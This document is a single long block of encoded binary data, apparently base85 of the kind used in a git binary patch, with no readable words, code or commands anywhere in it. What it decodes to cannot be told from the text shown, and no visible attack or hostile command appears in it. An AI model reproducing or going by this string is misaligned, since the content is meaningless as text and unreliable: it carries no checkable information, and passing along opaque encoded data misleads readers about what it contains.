zri?GUPkU=Kx?S5jof>cCZF%OvFJbHVQgwVi;Ixq-_WA>bTV=PO{Tb!2In0MImd~a~ z^3qqk<$to}pXnZj`iKrorZ!?f= z8^QEql=WDtdv$0}c@~0CpqT!*F#JY#4t*FjbI1_F>f>&Hdb?{60 zP%^pX@^>i4QK4Rjj}UG~ku%EKC~a~bL?5z6^H968$1(KmJ{>aTsEMnsJ-+U*Gl#wi 
za!n_MWLupP>cRA`433!txJoJGiCT&hEj{I}4x8GVD-e%+pDeGtyu?(&+L_LyIg|j6 zIMI|AtqG)ilCT0<*{B+Yy-fM#@jOWi;Z%kd>nZ#GP<(UE@`+s*B+K@kqGj`fD29bW zR!cxbcqrx71@BUE-+9e>Gk&=j6Sl{CE(fM<|6E!n3;&O{rCs)9-lkn|vk+Gz@Hmh6 zq9yACj-TP%CWi)v8zbH~;=5^Qnw+~wQcf% zdMJD#+AL<+aWVj~NAg;+aer$Smi5f6_iT1oZTJ0=!@{DB)oR-Xh9u3}E!Wif7Tzev z-_#2qJ1jlWLCZWX>PaOe|HtV~yeUH(gHyVF?Su_(Dys6ugCK^f}f zm4z|QI~Uc?Uuzkbx`LN80`>|{XajQsLsr|}*dQ7gTN5}2w4jpDb+oTq^(j4vo9#|n z1|{!J`Q45!v&Q83*L*owg4Q+&yjs;rBKY|lHoohuF!0xla;|U!6 z&<`UvG={Q3U);o{U!^F$%lrQH65efc=7Q>2r#!v*d=^Z5PT*?Ne@RhF#^WTtZ!xEr zZHx2TE1J_L7NB_PDzNwzp}Ez(iB)~u&h?&bDr&C=Zq&p3ijNDs6jB&%JV!ZG#p7yo z>X(!bx(*FO^7VpKW=mq~LxAe?($p3Y1m-x_SG&Yi*y*YIGL==bW>p@dXZtOxI?e|7|BO8M*AxCvqv4^M|LE zz#sxq26|p6MDnc|}8Di$MEA(AXtKQjZeT@)&?`bRQ?o z47yIJ2fk<~B#5l78R+Q4txGb6-T&1i9g7L97Cx^*xc6Z*dYJ2*F%_ zI=cjL1aj6HSOQc<{s49_DUPACi(Q>fI^=$I&^4n8OvUNLMyZz;Cmro;eLHSH=PUOB zPX256E+kQ}q0e#~Hp%5Z2sEick(VH98yI1T@srx-#%v;J#ZX%ySN1O2`IIhXln5th zLZ9xVMD9dO?}PR9I@PGY+eNBFs#tMz+&MPDR)Rf)Toiqc!F!->;imLH%2c2Zla2Lr z9!jwdi6iS!(zud{u41pGd;~e|UYUlb`pj3pI@b{n9S9dF_3m2YE}ORfa(pd<|2nxO zdpnW(i!Nx|XHJoCCXiVX7qBZWr(*H}ha2RKmRyzi$IkWxac7vLn_ItR9?PL9&Zrk7%B5P>zJN!^{7P3w>(#9OfRbtLJ zf1r63#Ze)=Ab^5^G~>?e5PDlh{2z6WSizQXtZpc`sU`9hS|Xk|uwiRw#6Ob~)X@?w ziaxu-J87jQs~nFa0D4cqt*dBsPOTuNrMRJAflCm#U9IdEU#h4&qO&6T14t&V zEFrE3du134d}Xi^ZImjfOUL=gg!ErR54*jh>iVWGWpadhIcl|X<5R{h6X;aCynDU7 zYJrJGWL@r26B);vL=n80B?Zr5iwB9bh^7=b)oJl*UdYkQhtf99&|bXCc%2yv2!xm0 zlJP&Y4ps?>QQ{P}gc>#mJr95fb6g0tHCu*=)}3C&)FI}vfm-_L;%L#G8GJ;H>ukI} zMewga1wcqhNI*pVSDW&`^(h_?LklWXhIi5bs8k65s#FdiQAI4RjK#9*Aw!k(m*RiC zMkq`1^|i-zpFDM+nc zZn$N-I!HNY@`72~qdXIud6&H|w7bPT{K(!dp|%^xGlE}zow_)+ zDJfZ3sqD)^b>fkC%MqFdlR2T2&09iZkJ3HTNDIOT#`+!M_o^DFKBKdm>n>VG>8Ci& z$$PuVP^#TKo%(uRpJ+=9MCU-OftnWjCJHrdmD^DG4Y5Ylb=Bm^q-V}q&jH`$)@JJq zUn&}zrAD&n8Ew5VIBWNF6PhW4OoEiiWO9jsaB+5HQtzR=EKwfPMJ<+jQ+LZt^7!D0 z%7k)Pk+MAS%k`Ng?^ADRC8e3DK(+wb8S?GZSlJuMHW}k~ocRz7vR<=!9$ z{-SFYe_`8|-je+CAJ0f0?MWgGFxk92zX<9>EX=CxR`cU868U$ 
zq_MIxkyq{_+6iKy4;yG-u^Pn*x7!E$CloTHBYsb%e$Q-Uwlt59(}z3vZHu-brkimd z4jpZNDOn-LNN<&^qo8J;4n>^+R6WQyfuoW*H{LLAKTg=X8W_FDQQ=+(QqP6^EbL97wM3M!# zZMa2s;dE4RCc|XkING{>Fc`ZyPgY}Z+TV)*NGd(2^R|tbcklU(aK>QsN6Xk;4FbIF z3Q_cozS2sa%(sybNG)HjdVts2j)py4&0%%lL>hwVSeMvigpK#IE~mTiPN=p?eIxLX zv-PdEs&ts)34M-?4z?g7^bMtg2y>*{2lrXblVS&O8hq)NVBZkU*U_JqLt;Mgk)DUv zdlHPLX#zkG0VK(YJUiG5t&v}dX|-7Y_E?h3ea1f|V4WEU=qk5Tpn%Eo<; zTXTBP>2F>)A#LR$ys-k-_BCYr%d2)UKd01ZA4j+zcgmgx?8a27Re^0(mU; zI^pf~g~-I5VQ+=WqRd05dspe3Yjy$+E6<+ZPyeyUJ2>lcj_OEGw95`97ijc%7^rQ8 zZ3z~9QEBQD-aQNCA~YB#BVF!%y30KdQKQfM+52mmde~S3ap2^^&TK~Yo2zcA?_n>k zShSe*Q_tn3#^v}RhI=BPQ}Amg`KLoYj$GTY-IvNu^sJe|E?Iz_{FV9mGqqTI`y0Iz z$^H(Pnw63ZLcRVU;^}hRGRqnQ(nLMd3CbUBsxl#w?LkcMFh`^ZF5pXwQzhE0IkyjA zzc`B^4S-p3rsA@>jp+pJZ`)^JBTvKB($5I(t@YAy-k$DnduIJ9B#i@jSsSU(6L~1m z@`QRxCDwY1Y9Df0uBtCJzwOK?d*v<<;oq?Cfh<9NjE|w}iNro8HDCD&?haE}DTFH# zFv?+6vR)^tT`_2BA>0<=JRV_aHXG{|!hQ#LuWl z!OHiG)WfBqp0(|hOd#JNqhUY-CdqJ{FCv`)7KD|a&yahtnzP!h43cp^eJ`I)%N9_) zmY<(zHFUXtei;uK%hnWAoiR4=V`q5SlejInOHkBZ8Xn+wnZ%!DoDdKvoSAp2A#%TJ z{RlQ}btHb2n#~y_Uy%lBl?Y7RhtQbcUiXE)b#X5^S{L~c`rbmwlf}Kd_@dNJI>rx4 z*kx=LktiWo^^zBmg!Wj;3?>NQ>AFCw#7%!G4htW(#h>gr~#lI5m- z6zX*SP~lng(9)}4vJSJ3KJ&Hi_qSCatxo&_JaS*zCfY)JhJT8W?G_;Cc%TVH*-sRv zGxSL8+HbRn^5|X(^g<=p4N9l(e0F{+T1UwHeAZhe&?sE1hp5q>gOAu4;HD#wB7)J~ zKcK7@h?a~u^GI|x@5uDuovVQx+F}E<;q{uvxT0sp9a(-as~v}n`$s7gGnQ& z2*-Wb$Fdb`OIu}Dv<6b9SU{TPalWT2;t4}U5H>P(#}Ub?6XT8tI-pHHArGDXo5R5x zmj0Kz73=*u6`bS#1yIX~<|*nH6fQVk+2$x$Zup7VUEmV!wm z^JEUO{k?E>DWEZYWPm1k`%V?E-@ejTIFH?A!z$bk>X5g|Ud1`@!9mC&Wi}K~+8G6Q zWn$xn!>QlgjKfIaEtaP+duMsHX?sR{{t=49Lw4ljw6q9!j4R6nhzQsLAeVWU?)0e@l(`O`ZBfOJ8ibJ7zYXTh!Ry8{W<-9FgF7yOHTv!$jn!Ltke+= zC5+}1YlZY^V=4*7d~C2A{kREBJ(ciA4M4#c3zGTmp(Bec^(ya|XcLzeIcKKc;}U7iA{WU!0>^R-<%RZNy8S@E~}%2N|0h3 z;wdLF?nU;ByA#=&@bwpIiJe@$q=*_EA)d9LE&qd(KyF z+G1z05^UsyyzQKDXRi_{l{UZzGz~H!sCa{{%SPUd8)S?1e#IOfnFM{fdWH)AgrCV! 
z8I|hxzaO4Wx=Eu$u8^H5;yh^L+E4z_Gx>+zgapjE3n`&CMMc5fzB~#T>oalh4kh)G zW)L%mEG#}j9^Lq4f6AUVcgmDDTEDO}XtIC5C}v4%YtiEgrRXzGuyXkRbU2v+pz*o+ zeM1%$&3kl>MPWoX%$GVwOCkK1)P0orj3J%J3R)JZLB0FV`iOV$rpg%Rc|PCW%SpaY zHdpYrxc50qWBmw36c9;je&e=clV)}C?eF(8=yEz`)_*slBO<$M!9JWcdmIcby5D4C zI-!R8dUEO*pxS~0;K`v^R|4g>WeWCj?_p9G!?BqJ|EoVu#Za*FMHTc_} z(kK?eU9w=YC$H*XWzXS*A@>kt!aT_8qZv+tBX^5WL>TP)`*ZODY0Ht^<8|3yj2lmn zNMF#;lR2fyw%wn|wS1)5iE&mXa=qJ`GM#-qO-%Iu=6FsZj*I{P1hIGON775qLl&z9T5 z*K`7cUrQiw5z$(H+9*_8dx?JA-;vJTV65Q!c2XKz@2gPIZ=39NLq^Jm`awr0;-C&K zW;9kbmO-D<$Zp&9&4oQz!?sTGd;O!eTJy$9#1UQ}#%MXlLZ*3!zf~(>cafl5<@;=1 z3LvVHiM5%eLxjYc+iE*_FLIk)(N}C!K22=uJ)G{dWJC;qS*_(VZ$Bg?FDRjLKGeTn zIWpgmQ|v)xu7ZDEgdF#oD|HnqKFVLcJiiI(y`37zU9_s2zCaSyt`Tb+H4k&=&0@j; z)!$l)F?XxNC(`wK+3NcDhmi6?slXR4mEi7D`HF21^dyRDk_(#J><9^Gq=M}V{(9tp! z`VoWbq3XEGM9mTo#lgC$BkB7$@8x(2rVf8fC*t+vt<6m?TcT=20srL9nF2_{dpCm-D?Gl)D z;(s@qQN_r|6P2WCxo$qMk*)-KgoqP(hD@cIH4o~*Omx!hu^!|*<#bFoyfeuYsduZl zcp6NBShx+hsV8v0zPqcMbg@mv9+bC?Y>t-f2I9oBt};8Uhef@1Y;l=e=zal1xQOS% zN_!1A_1?RRbv5AThm8EcNa(qYhTy>LIDJRjB6wPZ(*13j{^NKt@-58ABP<|C) zT>SNqz#w3ch<^gf8v@#@CEtj(hw(~e`wvF6vygKc3RZKZ?;aT$wfXfv@g=)^yIuSY z=_ER5rVoswW3Osf`@CwmN=76S3l@@%ORnY{_TU@Xi21~iVqY=lGTwBxpp5P3sNUiR zb@+sPU~;0>D%7lE+mzj-bzw6rOA8Mz2dZD({a7`Nqm6!nQLC=3lNG$1A@gWgm<}9^ z<8}S6-8JFrNzj#KyEVsC4scz5r__Xag&BS4bT1=AlZ@DJBXdrZwh|v-0$!YNbXU*4 z{RT_97_;eOz5JlE85>!BqVVXvzCbZtvm|H82}H280g7kmzbBv;J2x6`bC(oF49cLm zs-#*XHo8f;6xW%%ApI-1CO~*%EXRy-yHF-^smf^0{wIv>{cg}#bd4XI9j`|An)|TB z!q&Z*L15zCzSS;G5xbk%%Yb-kFQEInMifN6*R_q%^2tkgD{r3g2!efMu}&6)8Q@e@ep{v}98$H*8fa;_CL|9woCvS@iYfbO;dZ7Vz0 zfCT3_e^Ib2D?n)|5WVabI*;fW`{{KDH6-&j!`j@^*0n{Qc{oduQD$BIUhs;Yk|(+x zvB?C@ikJu0(7L;eS|72wYd;SOh^AOke|h9i1uCl|%Yq8|sqO+VViWl4>j*?fI!b_w zAau3!cZv28BIR-CFt1&pa@EaZj~oI7sqZ!X#KszZlT1vFlDNskg{Z4ebDgtAK%r-0 zbs5!_1lzRkF|2FfpJIsKxV%g4KsSBp zpBQnM;{_b=rpJYRS?lz! 
ztxwiN6uFP0Zcsyw+fH9(V9oHbB4iF-4{dW;cDT%#lbB>Aa`8t!(PJWVX03F-mzer zaKOcPUIcyl`yN8jZ-H|_V&-{63a5;EI%4e~`tfcO5S7+~kwGOJ$i$j^?W;#A1Z z!JTroi-;_{YooNKHowB{YtC9!V%=}PIIboh$jH7GnJ69HA-ems-@%7CX_Q}tEt z!u9F#UUH3miu~)Nc}nsI7YbFetN?~4c5TfU9iOpvj~eZt#Z0_~tGhB`8%n!#B9MH@ zUu5Rro3tx3hrqCrCF7S^J$X+?WoOPFx~LKzi>-_ht*04RtzpbIR@J+Q2FbgB0Lll4 zW{4wO9-H^iNnuMX^I3ikqkcVyeIM19yGrvZrHEds=7-Y8i)YeVZT^1%pg>>0{{U9! zhn%X|HXt6MuxAaK*I)b8i_S^eVv`Vy$s7>pHlAno{;|1I%)T>{kmOv}bF!+tj1+UG7I6Kr8|)zQom z=F4G@4*V8!bKriHOg&1=)3_|b4;I=>&9XRH%jRY zb}Wwt%q8g@@hEM)$vB?j%$9@w$%V#bnc!{=k3(xNnl-jX^$&2f#`xQQBjY?LlePHz ze&@j+8U6XYZMfNSw%N>@^9s_0<2047_{}oe?n2yS;u4iMD=DXxRG#yg8Fdk0PesDf zBH5e#Np^S~xiyE#l1AkI!@;RSAKxon;+8Q>jOUDW6cII>-dG*9S_;^U6)V{WK_v?pu)cwjjX zt42;T&|xp>1?p4$+#$>V05{P$2kv-lm3#Por^zz^06^|=E@jILv!X`gw`H(ckk``o zWy=u9Xj#*jgni?VqIH2_G3Is@3!y+Uf^dfAk)Xh{%Vy(Sw#}NX1B@f7PwDIkuXpa! z1p3fDi=BFfW+Up~FH0saiGM-&!!V?P$2SA&SymH);{X%Ip<89Og1A~FGlij$21}O< zyxBieL&8RTo-E@4JbH;5oPckLIf&{4bvE6RG^TL>G4Md{p13%*HmySW~S@VGE_j2Q*0I`m=G-Btsl2b+p@aKtBza@P5d&@gtG z@IcHXwOCWY4g;H#s=bKkZ{yq-gX6aR!kc^Am_D_uj$>4%t(7TnhcwXY#K9JY9 zgc~7-PkC(DfC5~LiELIi3h6jGgTZ;hW57od-RY!H7YOd<>22&)jN2k^d#^Z#3{6N^ zZg|^#cVt@+oy&1pfdTLT05%5pc*{GFGsldjvi|@=1+r|#Z*k_+UJhb@iza45TMdFE zmFnfm9n3R4M{93-*zCAl?3NtU2f0D5(w(!rw)b-pK)Z>>2;z6G(XHb?4z6C=e>>p# zH?JdYvE;!iV+pQ>wgj^O07K_ou;?z?CCkFRbpw6IdhDaCQJm83-MWA|9u_%14ej8< z=`LYAWTAMT<-kk5j}rLq$g}gpC7M3%&{~JMBVk&{66gE>0QvA@erJQblsQ{zcQ}`P zKhWJ_+0}S=0wy7F^%v1awDnWH1d=h#X9QgIDmYluz`o?2WugoPv)yiAS4na|J*|@| z)U`}kqBw{K7FP>s!HkYQ*yGi=@pwEwADQ5mTN0PU{S$mY$5y27&`2|trdI;T7|ihi z&J%&GhrTfuoE#8Zq;$-6j-;S5kOsaY{33o>N2^7C6&WE@ zfY>q2>XEzP{-}x@#7M^G@K@O`zVe(%Wx}j*--x})PmQ06@O&O$=%@9}Yd)>;iwO*D z1(zGxmkw{SV=T?a58OuTvs*qfAUV9Novpj~oV zE5bIT?I>MB<`A3F?oXNHW%7A{qVeE!CXWtahX=T*SB|4}+DV{vx@)}87Bh~oR3$Zp z!tWbKO~V!!8cd|-mJGVYjg01Jv%o3V!Lf1aDCRe%s+(+?$*^rVgv{a|AhK$3ekXX!>z&`vhXo2*=kuxu31vNAg&11D_Cg*mY}Kx;3o@af5u5Dak1auw?GPa9|~ zo2h^oL1M+6I{;b+W?QFoK^oce+O`vOB=Pf~q$m0=Fq9tG(jO77wzrE85a_uxs4%*d 
zbU~aBv9fW5eBIe`4(7S_;20wuOLGhau<(#z-mE-3T+HJs4>m^;=1IlZO8K&o{(egJf1c{GSJQNAzw8N${}I%tsglZYiEI;W#Eduy2o=P;CLa#IM~A_Ly0h&oWPkfO~D>7QYJ|P>jL6b*HCdLeIQ1_4zWL%=#$s< zZ~w#qD-Zzy0s;X71q1>E0RaF2000315g{=_QDG2qfuX^XvC;4#;V?k)P+s_ zO7fYk#BW60tBAEvHgyx&fY_V^)r;z$k#2E!KT;{R^@_Z{HZ-t37pyg+(E61DSLO%} zk0xmo%P~K=Phf^wEk$&eFA#$HmJjMLr?fOa&|H|?WEyTORWz2oLYapu_L=eRDFm%S zJ3x-eEUt;X&Z-=5+C4~CD~AzvyvsC9{T(BGJoJDtxVYa=A}@344RHspOR>}z^h_yL zmR35#x~Mi8N*vDFhOZHKoxn>0(jwn8m{z9u%(a9GrYLQS4S`mU6>At_V#SOsS#st7 z01JZ3HcUcZ)OX|iup`7zER(|$}=1HAgB%Cv@`7% zkzAu@Mfag+Ly0bwG_DLlMFx6g3_I8$iT92Ir>9_VQfI95PBk*T(X*ms^)UB z+5=+*Kcbb8!`dNcAzbv1s<92Nl8~(WOchjlZaAoEgRnS`!w>|0vBX?1Ql_Ic$9&Dy zZi~3y2VEs9WU0TZE0`q)BfD-7QZ$NgI+FEq>~jrK8Eni2VR0>xMFwShBq{+}q@p89 zW6U{%S_tq9yo5l7WsF$G#fmIgzvSm2c87;&ta@IDC!80m24P0)8@WzgOszu8ZHm)z zRV`%~mO7lUSyIb-C6prTTNPk-M=f<5Wnw_7?+1{uQB8G$($(iT2KvM;7rejL!dwwx$>gqGl~j;i;2%6hBma8}pZ1?h3sGD$S8Y`%3%Be~wC+WEEnz0+Vef{B$6za#Mz0M#*BC8*Ha7pEF{jn<)dq60<8N~owE>JqHTWU{9Nhb*y zvr|)w;mlNmVjhg-#YKMcnkt~RML|}`-73qLXS^~Zp0cXnQYj&jvm2GiRLYy>mCb2o zayDwsz$16e78qD8G%@Vu9=`|@yD2Y{YgNuRBZz)D&W-M6Ci-^UK`ED;rDTD0!!YT!x zFLD@7umKDb=fKJtEtod2T;3~}5&&iaIDo|N0QXNUAXjb5LA8#PxS|Y|EEA$!w>(EU zs?$|He+&w$xU?b@<}$+}T8h@xN=BfN!39{!0S_@pt~G?>7Bk8)ED?u9X`;(9Xd?QC zAs8lz@*F{_2)CF^%u8gTw+tIII4LhE;&x!%Ex}G>xtL}FFCe&947u=gMkh`l@s&)! 
z9sy~YRd3d4S$8)wVs?ZQ+Pasm_-oC|<>G1K@|jtV*RO(%Yre6L7)u3OE`)TCuKLST zPb>cbf{Mi+q{sG5qv@Z%qdG);$2ZJk-9qJvHcVCs2GK4VgS2JFCE`HEX7I{Z^$aSq zU|47kl^9)v?-^T~t;^RLV)_o3Gm02kIU9hkt#yK~Bt#`4Uo6w9aj|01DwU1fEf*Gw znR8Vfu&lh$^_hd8DAqTVnQzt(2!XhqatfL4MYUR}gki>_Q9JD~V%sh(V)!v-{{Wou z6oRZyCBP5+(zI|&R7F{XAk;t}W4yS`n5k#EQ$Frl23jvL;@24Fk})o#gi%4}4B2rB zIU~Ao%9L$)5t|iK_X&-WpKNA1mDOfhsHotWX_gD(A@LwA;x%a3VzgnF8e=dnN*;-n z;%m5+EtZgvyTB+5)TxR!Q&9z5xla+5(C5M}Ze7t&e8ZO?})Mwn_{#IY|x$}GmtWu^Vo z`(!S~`ozQL1$aA4DtbXQELw`hc8aq25+&%x)W&FwAVG?ALOp>F2X_p7GYjNIRggd%VGgMX)(+Dh zVit6e+Op2DA)>_WRuhw3hlNV&mks0?5UUud@uk2xnF|R>c~x=NhKy^7%~Itv6#}N4 zi~^zBkx`1OxtNP1P>X=HR6%5@!(!!8Ngjz#sW;vkXZm)` z9FCY`^Nxqs5^wTk|oUq}EfTtOG8w4HiH z#bC=Go#CsCcMlt4hjjyROOOmp{)9D9=-9;Z3+_wU9bkn-_mxQi)z2(w!q@{-Jz!W0 zhA#;B9YF^d6`%_&%1RrIh{D`_7`TfTTz}M6;63$?Tf?kEBRaA~AbzmiJ7Sj^>WN2| zBH|$~RVZF^m^g(7RWL2fbsP>Dw?}c-dU=5|%zew4wxF&hQx?ExqPvRXIF6v?iF3@e zxB`i5xT;e$tklUlAa_QMMB#8on8PcErtmcc#%>p5aOAq3bHTa9w@AV;ej0zHi0kMhjt@wU*!J%Yt53`dIJgdl%yfmoftU0O97ltCc_n9b7j?l%s7F9D z=AX7B^!i1`4JLogH7`Tcc6miI!O6)6fpt>#&X}FxcT+AX%3@v#a+YRNEl)UVk$vN# zF)mSIyMdM_BGZUHyx%h-Y22mBz)YC!nW<4*i~^&HZVg-oP1|w$L<`q7Ds2=+A|A;| zwRId3o|=m>Fc@Jntjz^@J7O)&9xPjn6umMprKV?-7XBGVXR z0utG9T*pJ#z?P@P>7^iahngphSlJDeh(ujLq#h`t!sX>CN0cDp1s+h2M}eMU{-MvB zT2mOBSyg?}_m)8`8<-ZIr9=nP3R>I<#sW}YEURLxY$2cyCljV;N$Qg%m~jHBnv6RC z0C57nV7lcf0gm#bj~!(L(@-dmiNP-UaBz8lm$iTkhuwePqFMa7iozJNZo0rx!zwwH zoh+;J5SwWE%yf~Fc#5cqxESRI82ZJgnL^g(g#)V`x;WvPmvDtGTo_o;<~puxy2Xkf zMt-o3?6+iJ6gx#|C!hIFFf@^ZkD`1#xK8Ua*p)Z+@R`WMn`T7nS#EAxYF%kqy&%JB zXKb;iTAR2dOv{*4n5Ph#l{dr&;d7a8kd<=V7Am=mek&H3qW=K2N+mqJ4}Vf0{Xr`b zGl?c5V!20vxac)Rz+MFK|7R7`cx-1OpFk#FG9WienP*CdO6R5@+B3$Vi z*SUK)alS$qtV9}Pk{aV1wG=0Ekh4)}Aci@DZ9JkS&`(6lzzB0KQ<(RN;KB0L0Ejf) za?*ttG7?%}w5f4yy?f6;Cf{&M0%le^*J){@IdfEBzlbeEjwV4+1(nQ{6GlAc+$}4w zNu5t9XqUXr^%)AGluIwC*Ss|Va$=(=UoZJ`g$}I99!XAMY%?#ZnF$urtCcoj>o2Oz z+kjgH2fwVPE@~x98F|Ic%Eih98^(4p6kG7F;WcbgxVI6*F71wc%9IN3OQl=d33X>u 
zKjS4|%8+=GioD}@E6y0}3w4(+ZV4qa)o^imlqtN|l(+ps`u!u48uEg98z!Vp+uYse_TP`5VL@o8_aA= zmpHPV>oF4Y$`wEiZUX0U1g*;CnRKzZD@!fKp>QJjiDn`OWzFg`T;LIJ4?MVE5r%`)#Y<))>j_*^yNQtDYbXENfF{0ga!Odc06 z6V`BJ)R~N4@G6lX@!H&T!H5+@YhT6t<}f9QrPalWSSlXCsee=H7%DxGuEP6HijHwF zJslw$Z5Tabphc?|<1VGeisa8(73MKR=)xD4b)(>#OF8f`CZ;XRMY*hJq<3%l^6nEA%iN-t3S%y)lv=~L*8SfIDzR_D=3y%ehxT1`IoBpXP zW$y7E5*C3_b0GoPFoZHJ02~t&@f{ss3HeVbMru>*3fu&txrugeE$B68TbX9bK{-j6 zgHq%sYmvmv*u zIq)WB(HnS&lnh1&!8ngbYF1^oq0nF&rfZ>fZPGthVx*;tGUakeDryqRW(6u)sAf=* zcGfWBqga7sl=zu309{-aP2;2no($a!2<;|4<^hRy)-0#gqU%-gmHrV>jU>%Ma&8hv zMiaZLk0~2EWiAV(d>W2Z1w5meiHI%{B(;X-W>T45rI2{3Lc7cHGgNt(7r}}xMeu){ z{;2p}R=$kIOJO45RqGT%%w@BPD^HB82UUt1*$Pk1;@Xlu)P;)}>~Q$8L>G3`;RF8Ia}|ZmuCvRy8|40T{TH z^BHa>Fv=M-FRhF{FhDO5cPzsoIq;hzLM$KPVxtcc@L6)5e?(i${t#6KvAmCH7L*Wf zB3`082%MmGs9}TJ4V6&J+hCJ=_>FWJf@>0qdLpnQ7b+@hP{8I?6JHT`)Ebz>e+|Nx zq3S~c^;@L-m`P!{>2P}6&V+A4eMv_PT49RqKB!GwP8O$XRvVc+tnnS%*;@|1B`32h zJuDLn&Bt5J;P?X2&<)3Shn&jdZX8NcVrECuIqt|yS5Jm3q@Up#Wo2nO^OVCF0l7w@ z2~i7G5DAe}7I$h{FiZ5J_9EaN^%bc=a~}_~YxQ)4z~`h$SbZWqWm4+Gmbyi?jJl3U z>M?y{{{S)`5BkQX4{}m7Q|!YG-e{l#x=e_~UK4tOXIB!UF~k7mW&Sa8cb$7wF5-v&`}vW+Z+R2pE{YnbAOK*2eIUE(=6XISKIe4?Op z12?&I(G_G@-UcoOdGw0e5@{Qbaxm<&+(AH=JjGfe^oiPo`~v1>Fur2k6 zjn&jO=~2a1ONt;AMPey0Sl9^FhS>I-o#|8^L`WM?BpTJ+tu>H(Y8Q133__;K@h%0c zYBnvHfwroSVMW)gVjy}utan19f|mFFs4iJ?)A^q@oS6J12QcU*O~kIS-rx7jv<4{) zf-uCDwE?u38}ge*{%%sTk6`mP?#IM3f!ml4pB%>h9f@nd^*4;q?hsrT(hR=R`Ijng z1JVh^5Q0ENr%i}l7IVweYk$dQp1gD+q`(3@13h8hlZY1RFkB0a^*0SUZ*s$21VZYU z;AHy4b#TBuMa?m6W8gtO;#zudf*cd{pVSi980d;iKS(q+9K>SnwlR();IZN__;&vQ zXyQb5I*1$h@+ES8)}*Kyge@C+RHM25MNU{keM4Qj69Ih0fPr^3546j+=2?b2wsN zRH>h6iVTdzIG5GLHk6DYFyMXpyYnIM`XYkxHH%`+knD5z}&(bK%H^jm$ zbb_sEhP~!Y5Qv>12DppmFt=|)W!yVNR+Z}i0JEuyUc)HP(WlmG8zrVLIw^x=b#oq7 z)@jx}q6Id<2J&+Rx`UvzG{sjizyoIx<-xK30F6doy@)fafQ(M)mZ-Z2nr5qPRNrO7 zG!ob_!8Eq|%;&5n3lBMYd1bE~fi~(;-VviEx2&k`9p)<9`^(yArs7+|>JFCI30K0S z9mT|Bi~bXE@IS!+08C@mpU->uoy5yVrO0Yf70g(uek$IQis}@B9VcY|GO3 
z739km#l&N?8o`LCiD*IW7#fQ9o7^HxE~CvKL<|h0EFqT2txfcb$4_~WmOw=^N`(?g zW-zq6mmySkmj)y3CWmpri-eIVlm)4RywnDr%Jq*Vz7Z7HG0l>rxDpn-MryU;f{n%b z%ZeOJAxm_KQ)InRgezjo&CJH&>k5AYdrN%gAx0+xh!g6BZnELh#jG+z9JLr_nEwDMt;|?7)LZN!v|1dB z8i*TClHKN14P}q8Gtq`?h|5&WtPAyzsOPR_%_5>1S&Z#PEm3x5+nYtQHjGl{W#PEx zjgK86n{(iMLc9&lQuLCG@(T43>)(lYJzhHeNR+Ox?Fv1_F2<-rtZJVLJ1TujZf^qHQH zlHnFBH4kuU=_^3ziCP8uORAbUmw^ntkRkdI-G*C*nqw+}*y>j-$%5il#TG5a%wI_V z00Y7PE;0T@WBy^xOSDwSCA^25@W3Q)Q^wRu*R)q$l9Dh%)GAg`Jw+@k1=JF%r4o^f z>fqUAsj+Z*WrVP|5|uJS#+4J=53XC4*2<4e8*IgvyP37rykt3+S8osk+%ibZSBXAhFi)(BW z@8l@%$8~MHSgomv%Ns?CD6#%e@l$7k{wIU}e3a^WL_m4ZOg{A!pe>s4MK-31(fBMT zp)g#zcer4imtB@qM8Qo&5-bGLBBqT;B{35w;gpCH(HoD~5`_}aMkOf>M}m+jtBz=w z16sosYqTB>)JRIv+XDlV3NH{sd5BxFa~So4(kr@xmdrjc2k`3S9}UiGYr=_wRN6Mm z@8L`yvvSgrmbke80P_s_`b_~6%|&|b>bfp7esPcaLfk@ahgzao_bj%Dp$ld90uPh( zgXsFBT-E0l3a$-67wY2w04WjM)SP&Tjzs?eGSvAnjEVMwPLS^<`VwVukd$`o0J?e3 zt`ic4lMEGoU~m{XVA8s7WO+oH=-f7s9bkZSGYhMEg7PI&H3b57a=C3(TT2uGx>$CK zVm@gxi1&S1*vlLjv^8Fk-TBJE?)*w6Otg(x7;}^jH029IfBvyDI;zK9;0%-C^ zaYnQ`4<~kU0t9A;REowh3u(oDn-eL}0DHZeKjVn3f=! zifI<+iJl>IaLbs;^Fkwn`=E*^O){*%bNq$tCe9enw`tFr)PT6j%qxs2Lb7X#p5%@o zCs>lPmS7nfaOX13gxhG9H1s0*<&_g5P#SS;8xheva>$DNokLOLHnDb)uQkgQ;D*R6 zG)G#~g7t8PwK~AsGPN?p3lwvz3aVAVh}c5Ulw3uQqQyocmml&t$N6M`qM&66G|te! 
zoBM{GCsY!M?j}1KfVae{9U?%-7R)AkxB{wB-D4rlY{m?Q%nI#*j|pKqg@li8u}-1b zH6POv1!fRN;Fu-7E&!%qPZEJkI?GD3#93*%V>Fp75D!rTQq*ECm0f9rZr2`i6owPN zx!+<+#0>ZZh;*j`2@iFMOs!ZgHOcVBY9PB$2mnqcWe>0KNktetc}p5USSvv)JT3`B z!(N}zAS@Ov6{)R4m1Ua12)E$IEJysyJ_-EhKjh!=cfIj0 z22fu+CAk(u)-x{(h@-N)%&Uk(y7Q0QTv!H}g+pwu52_19R1LwjnfX(cTo#~`OqqaO zaYAjYP=+bjSy@9{E$J7l?JAb>6foQ}cW`ZIGaPT$TtX#^RlqD8j~*s!Dnn77%&4m6 z%9jFNJRAk4>xta`J4%O=2-J3lQWQYJ^9M1CGXVI8J9Es&i_9Choc{HfhgH9MesdO8 z^^V-(h7q&-_mrV_et#0{w8k3s29Fb#1pzuv5AqpKo!(b(?9s@Pxg9LLWP zLdVH^8+8WYQC|^D$1^UamQ=}!D3rzYou@GYWVMA##t3T9{G8HP5P8hN8tLUM*EbRu z$~L4o3^HkkkRn_I9)(xtX^mH*AGyc)kdYHf8mjQP?PYptdWI;6=Wrc7@p`6qqu}JWAmq?PLs-B41HdV!8PO*3g z0^_k7O54rCCCx@HMT$?(iDmfEvDH;r^_S7pl3l6}HYLisje!Mf z7XSc^K;lx-5X6>(Rg$ubn1);wQY@er85lLXfa6d=GuBaZ>o0>$ymFSgnTJq|qGNi- z1%^n?i~b`9QGEYI%cuA+$m!udzJ z{mifH_pGhv3-{6>A_(kaq^)WC*Z2#i_#tPL^m+Aw00E#PVU=#8`Qx2pG&7ErJKNfC zEcH9g7g_${01eDQ#_`(XsZE%a_=`HsKS^K$t^7u>_lQU}jevMnQa_gz(EdJ07ZGiRuo`JIjih(5j%^c<^Bz18+yYOhJp@=>JDWUC>N4t zi|YUiKUf8kuu}&i1`mxZn4xz|J 